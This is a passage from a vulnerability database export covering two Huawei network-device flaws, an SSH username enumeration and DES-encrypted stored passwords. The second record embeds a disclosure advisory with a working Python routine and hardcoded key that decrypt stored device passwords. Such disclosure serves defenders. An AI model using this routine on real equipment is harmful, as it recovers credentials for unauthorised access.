                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3300_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3700_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei",
      sources: [
         {
            db: "BID",
            id: "69302",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2014-5394",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2014-5394",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "NONE",
                  baseScore: 5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 10,
                  id: "CNVD-2014-05162",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8.6,
                  id: "VHN-73335",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:P/I:N/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 5.9,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.2,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
               {
                  attackComplexity: "High",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 5.9,
                  baseSeverity: "Medium",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2014-5394",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2014-5394",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2014-05162",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201408-326",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-73335",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal. plural Huawei Campus A switch product contains an information disclosure vulnerability.Information may be obtained. Huawei Campus Series Switches is China's Huawei series of Campus switches. Huawei Campus Series Switches has a user enumeration vulnerability that allows an attacker to exploit a vulnerability to obtain a valid username and initiate further attacks. \nAn attacker may leverage this issue to harvest valid usernames, which may aid in further attacks. A remote attacker can use this vulnerability to log in to the server through SSH to guess whether a user name exists on the switch device based on the information returned by the server",
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "BID",
            id: "69302",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2014-5394",
            trust: 2.8,
         },
         {
            db: "BID",
            id: "69302",
            trust: 2.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            db: "BID",
            id: "69302",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   id: "VAR-201801-0087",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
      ],
      trust: 1.3045695790909089,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
      ],
   },
   last_update_date: "2023-12-18T13:24:12.542000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20140820-01-Campus Switch",
            trust: 0.8,
            url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
         },
         {
            title: "Huawei Campus Series Switches User Enumeration Patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/49234",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-200",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.securityfocus.com/bid/69302",
         },
         {
            trust: 1.7,
            url: "http://www.huawei.com/us/psirt/security-advisories/2014/hw-362701",
         },
         {
            trust: 1.7,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/97763",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5394",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2014-5394",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            db: "BID",
            id: "69302",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2014-08-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            date: "2018-01-08T00:00:00",
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            date: "2014-08-20T00:00:00",
            db: "BID",
            id: "69302",
         },
         {
            date: "2018-02-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            date: "2018-01-08T19:29:00.610000",
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            date: "2014-08-21T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2014-08-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            date: "2018-01-29T00:00:00",
            db: "VULHUB",
            id: "VHN-73335",
         },
         {
            date: "2015-03-19T09:24:00",
            db: "BID",
            id: "69302",
         },
         {
            date: "2018-02-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            date: "2018-01-29T19:03:59.157000",
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            date: "2018-01-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Campus Information disclosure vulnerability in switch products",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "information disclosure",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
      trust: 0.6,
   },
}

var-201306-0006
Vulnerability from variot

The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack. Huawei networking equipment use a DES encryption algorithm for password and encryption. DES is publicly known to be easily cracked. plural Huawei The product uses the stored password DES Because of the use of the algorithm, a vulnerability exists in which a plaintext password is obtained.Brute force attack by attacker (Brute force attack) You may be able to get a plaintext password via. Huawei is the world's leading provider of information and communication solutions. Huawei Quidway is a series of switches developed by Huawei. The Huawei CX600 is based on Huawei's mature VRP platform and has powerful routing, L2/L3 multicast, 5-level H-QoS, packet buffering, and ACL capabilities. Multiple Huawei products are prone to a weak password encryption weakness. Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks. The following are vulnerable: Huawei Quidway series Huawei CX600 V600R001 Huawei CX600 V600R003C00SPC900 Huawei ME60 V600R002C07 and prior versions AR 19/29/49 R2207 and prior versions. Weak password encryption on Huawei products ===========================================

[ADVISORY INFORMATION] Title: Weak password encryption on Huawei products Release date: 13/11/2012 Credits: Roberto Paleari, Emaze Networks (roberto.paleari@emaze.net) Ivan Speziale, Emaze Networks (ivan.speziale@emaze.net)

[VULNERABILITY INFORMATION] Class: Information disclosure

[AFFECTED PRODUCTS] We confirm the presence of this security vulnerability on the following products: * Huawei Quidway series * Huawei CX600

Other models are probably also vulnerable, but they were not checked. As a consequence, passwords extracted from a victim's device can be deciphered instantaneously.

A Python procedure that decodes a given password is included below. Upon termination, procedure decrypt_password() returns the clear-text password.

from Crypto.Cipher import DES

def decode_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!')

def ascii_to_binary(s): assert len(s) == 24

out = [0]*18
i = 0
j = 0

for i in range(0, len(s), 4):
    y = decode_char(s[i + 0])
    y = (y << 6) & 0xffffff

    k = decode_char(s[i + 1])
    y = (y | k) & 0xffffff
    y = (y << 6) & 0xffffff

    k = decode_char(s[i + 2])
    y = (y | k) & 0xffffff
    y = (y << 6) & 0xffffff

    k = decode_char(s[i + 3])
    y = (y | k) & 0xffffff

    out[j+2] = chr(y       & 0xff)
    out[j+1] = chr((y>>8)  & 0xff)
    out[j+0] = chr((y>>16) & 0xff)

    j += 3

return "".join(out)

def decrypt_password(p): r = ascii_to_binary(p)

r = r[:16]

d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
r = d.decrypt(r)

return r.rstrip("\x00")

[REMEDIATION] We recommend to store passwords using a proper hashing algorithm, instead of leveraging symmetric encryption. Further details are available at the following URL: http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141

[COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2012, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201306-0006",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "acu",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003c01spc100",
         },
         {
            model: "acu",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "acu",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00spc100",
         },
         {
            model: "ar g3",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "ar g3",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "ar g3",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00spc200",
         },
         {
            model: "atn",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "atn",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "cx200",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "cx300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "cx600",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "cx600",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r001",
         },
         {
            model: "cx600",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "cx600",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "e200e-b",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005c01",
         },
         {
            model: "e200e-c",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200e-x1",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005c01",
         },
         {
            model: "e200e-x2",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005c01",
         },
         {
            model: "eudemon1000",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c02",
         },
         {
            model: "eudemon1000e-u",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "eudemon1000e-x",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "eudemon100e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r007",
         },
         {
            model: "eudemon200",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "eudemon300",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c02",
         },
         {
            model: "eudemon500",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c02",
         },
         {
            model: "eudemon8000e-x",
            scope: "lte",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00spc600",
         },
         {
            model: "ma5200g",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003",
         },
         {
            model: "ma5200g",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v300r003",
         },
         {
            model: "me60",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "me60",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "me60",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "me60",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "me60",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r005c00spc600",
         },
         {
            model: "ne20",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005",
         },
         {
            model: "ne40",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v300r005",
         },
         {
            model: "ne40e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r001",
         },
         {
            model: "ne5000e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v300r007",
         },
         {
            model: "ne5000e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v800r002",
         },
         {
            model: "ne80",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v300r005",
         },
         {
            model: "ne80e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r001",
         },
         {
            model: "ne80e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "ne80e",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "nip100",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001",
         },
         {
            model: "nip1000",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001",
         },
         {
            model: "nip200",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001",
         },
         {
            model: "nip2100",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001c00",
         },
         {
            model: "nip2200",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001c00",
         },
         {
            model: "nip5100",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r002",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r002",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s3300hi",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s3300hi",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s3700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "s3700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s3700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r002",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s5300hi",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s5300hi",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5306",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s5306",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003",
         },
         {
